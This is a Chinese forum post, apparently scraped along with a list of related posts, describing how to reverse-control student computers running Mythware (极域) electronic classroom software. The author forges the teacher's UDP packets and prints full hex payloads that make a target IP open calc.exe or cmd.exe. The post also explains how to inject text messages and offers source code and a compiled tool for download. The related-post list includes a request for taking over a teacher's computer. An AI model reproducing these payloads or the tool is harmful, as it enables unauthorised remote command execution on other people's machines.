计算机电子极域控制,极域电子教室的反控制实现【无需教师端】
本帖最后由 jidesheng6 于 2020-10-24 16:21 编辑
大概是去年,有看到CSDN上面几位大佬提到过,抓数据包来用极域去反控制其他机房的学生电脑,但是写的其实还是不是太详细,有代码,我当时也没看懂,最近无聊就重新实操了一下,在这过程还发现了不少坑。
首先老样子介绍一下软件:软件是极域电子教室V6.0 2016豪华版,具体版本号我没去看,现在学校机房大多数用的都是这个版本。
首先打开Wireshark来抓包看看:
抓包1.png (67.54 KB, 下载次数: 51)
2020-1-17 18:21 上传
不难发现,教师端的机器一直在朝224.50.50.42这个地址发送数据包,其中含义我们也不清楚,后来在网上找到了一篇网站是介绍这个极域电子教室工作流程的
1.png (46.72 KB, 下载次数: 14)
2020-1-17 18:25 上传
接着我们来给学生机器执行一条远程命令试试,然后停止抓包
界面1.png (95.97 KB, 下载次数: 18)
2020-1-17 18:26 上传
因为我们是针对一个机器来执行命令的,所以找到目标机器的IP地址:192.168.3.2,可以在Wireshark下面看到请求的执行文件名,前面还有一堆含义未知的数据,另外:数据包的长度建议只多不少,不然消息无法发送出去
抓包2.png (76.48 KB, 下载次数: 8)
2020-1-17 18:27 上传
抓包3.png (55.49 KB, 下载次数: 8)
2020-1-17 18:50 上传
我们去把十六进制数据复制下来,得到这些数据:
[Asm] 纯文本查看 复制代码444d4f43000001006e03000053ca6c1aee108e419f4972f36d109c69204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c00430041004c0043002e0045005800450000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000
数据包很长,但是无用的数据也很多,上面是打开计算器的数据包,接下来再抓一下打开CMD的数据包:
[Asm] 纯文本查看 复制代码444d4f43000001006e030000a53fbfe91d62404cb156c44f90b18441204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e00650078006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000
两段数据包有点相似,经过多次抓包实验发现,得出一个结论,前面的:
[Asm] 纯文本查看 复制代码444d4f43000001009e030000dc79fabb169ec04ca009db380f7f34ee204e0000c0a803fe9103000091030000000800000000000005000000
这一段很有可能就是固定不变的值,起码DMOC这段十六进制是不变的,后期发现,相同数据包在一分钟之内只能发送一次,后面我没有去改代码,应该是dmoc后面随机几个字符,就可以实现了,有大佬有能力可以试试,这些都是猜测,如果说的不对也不要怪我哈
到这里还没有完,因为还有一个发送消息的数据包,我们发一条消息给目标计算机:
发送1.png (36.26 KB, 下载次数: 11)
2020-1-17 18:49 上传
发送过去之后,我们来查看数据包:
抓包4.png (59.81 KB, 下载次数: 9)
2020-1-17 18:50 上传
可以看到,前面一堆数据之后,出现了我们发送的信息(604F7D59),这边就踩了不少坑,之前以为是十六进制,想着转成十六进制带进去就行了,结果发出来是乱码的,于是把汉字用各种编码试了一便,最后发现,
是Unicode编码打乱顺序以后再发送的,解码是学生端那边的事情:
unicode转换.png (15.79 KB, 下载次数: 9)
2020-1-17 18:53 上传
可以看到“你好”这两个汉字转出来的Unicode编码是:\u4f60\u597d
处理一下就是:4f60597d,仔细观察,是把这一段分成了两部分,四个为一组,把最后两个和第一二个位置调换,如果我们直接按照转换的4f60597d发送,客户端接收到的就是乱码,我们把乱码拿到Unicode这里重新转换一次,就是我们Wireshark里面的排序方式,说的有点乱,具体是什么样子我也记不清了,可以自己试试
既然知道了排序方法,就来处理一下,但是我只处理了中文,对英文数字没做处理,有兴趣的可以自己处理一下:
Python下的处理方式:
Python处理Unicode.png (29.2 KB, 下载次数: 14)
2020-1-17 19:00 上传
易语言里面的处理:
E语言处理unicode.png (22.66 KB, 下载次数: 16)
2020-1-17 19:01 上传
最后我们把这些得到的数据组合起来,用UDP方法发送出去就可以了(所有的命令一分钟内貌似只能执行一次,需要多次执行可能要随机UDP包数据的开头部分,这个我没做,大佬可以试试看)
效果如下:
demo.gif (929.12 KB, 下载次数: 15)
2020-1-17 19:03 上传
悄咪咪说一句:然而不能在学校里面测试了,因为已经不用回学校了
,虽然写着无需教师端,但是教师端是要在线且要发送消息的IP连上教师机才可以
E语言源码,看到有老哥要的,这个应该不算病毒吧:
MythwareReverse.zip
(933.6 KB, 下载次数: 925)
2020-1-18 20:26 上传
点击文件名下载附件
下载积分: 吾爱币 -1 CB
更新一个编译好的,还是初始版本,有的老哥要直接用的,下载这个吧:
极域1.0.zip
(1.1 MB, 下载次数: 850)
2020-10-24 16:20 上传
点击文件名下载附件
下载积分: 吾爱币 -1 CB
计算机电子极域控制,极域电子教室的反控制实现【无需教师端】相关推荐
- 计算机电子极域控制,极域电子教室控制软件操作手册
<极域电子教室控制软件操作手册>由会员分享,可在线阅读,更多相关<极域电子教室控制软件操作手册(2页珍藏版)>请在人人文库网上搜索. 1.软件操作说明:1.双击打开极域电子教室 ...
- 在机房如何利用极域反控制老师的电脑呢
在线求解如何才能反控制老师的电脑,如何解除本作者已会想学的评论
- 谷歌扩展程序设置ajax请求允许跨域(极少人知道的解决方案)
谷歌扩展程序设置ajax请求允许跨域(极少人知道的解决方案) 参考文章: (1)谷歌扩展程序设置ajax请求允许跨域(极少人知道的解决方案) (2)https://www.cnblogs.com/ga ...
- 究极日月服务器维护时间,我的世界1.7.10柒梦之域究极日月神奇宝贝服务器
---- 服务器名称: 柒梦之域究极日月神奇宝贝 ---- 服务器版本:1.7.10 ---- 服务器类型:神奇宝贝 RPG 生存 ---- 服务器人数:200 ---- 服务器的IP:ks2.nid ...
- 极域教师端预览学生界面学生机按IP重排
极域教师端,表格视图中可以按机器名或者IP地址进行排序,而学生桌面预览处通常是按第一次登录上来的顺序排列的,这个看起来不太方便.另外,我通常喜欢噢易保护系统在刚装好重启进入修改IP地址的时候,让所有学 ...
- 计算机调试员高级理论知识试卷,电子计算机设备调试员(高级)考核复习题—理论试题.doc...
电子计算机设备调试员(高级)考核复习题-理论试题 电子计算机调试员高级考核复习题理论知识一.判断题(判断表述的内容正确与否).1.信息高速公路的缩写是NII.( √ ) -National Infar ...
- 域外计算机访问域内共享,域外用户如何拥有让其他电脑加域或退域的权限
域外用户如何拥有让其他电脑加域或退域的权限 佚名 ChinaUnix博客 2011-07-27 域的真正含义指的是服务器控制网络上的计算机能否加入的计算机组合,这样在域内的计算机就可以共享资源,也 ...
- 计算机电子信息类专业大学排名,电子信息工程专业大学排名 2020全国排行榜
在填报高考时,我们往往先想到高校和专业.对于很多考生来说,如何理解一所大学,如何选择一个合适的专业已经成为一个大问题.今天我们来谈谈电子学信息工程专业的东西,包括电子产品信息工程专业简介,电子信息工程 ...
- 【Windows Server 2019】活动目录 (Active Directory) ——将计算机加入域和脱离域
目录 8. 将计算机加入域和脱离域 8.1 将客户机加入到fjnu.local域中 8.2 验证客户机加入到域后的信息 8.3 使用域账户用户在客户机上登录 8.4 使用本地账户用户在计算机上登录 8 ...
- 全国计算机二级vb 文库,全国计算机等级考试二级VB基础教程电子教案.ppt
全国计算机等级考试二级VB基础教程电子教案.ppt ,Visual Basic程序设计基础教程 电子教案,制作人曾强聪,2004 年 4 月,课程内容,第 1 章,第 2 章,第 3 章,第 4 章, ...
最新文章
- swift笔记——环境搭建及Hello,Swift!
- 统计学习方法笔记 -- 概论
- 一个aov网用邻接矩阵表示_关注讲述我和朱婷7年7个故事,见证一个明星代表的诞生...
- PHP程序员面试中经常被提问的问题【转载】
- C语言const的用法详解
- 虚方法的使用 c# 1613719803
- html语言怎样设置密码类型,html – 在使用contenteditable div时模仿密码类型输入
- Golang 实现 【求字符串括号合法性 判断】
- 经典的SharePoint 2010升级中的多核CPU冲突问题
- 局域网ip冲突检测工具_软考网络工程师之局域网与城域网(无线局域网,网桥,VLAN)...
- SharePoint 2010 中有个新的列表模板“导入电子表格”可以直接导入Excel数据并创建为列表 ....
- wow.js中各种特效对应的类名
- 国军标GJB150A霉菌试验详解
- 三菱FX1S PLC控制伺服电机小结
- Android面试题(一)
- java try 性能损耗_Java上的try catch并不影响性能(转)
- Latex的各种帽子
- 计算机显示器刷新率怎么调,电脑显示器刷新率怎么调
- 写一个强化学习训练的gym环境
- c++primer 第二章 变量和基本类型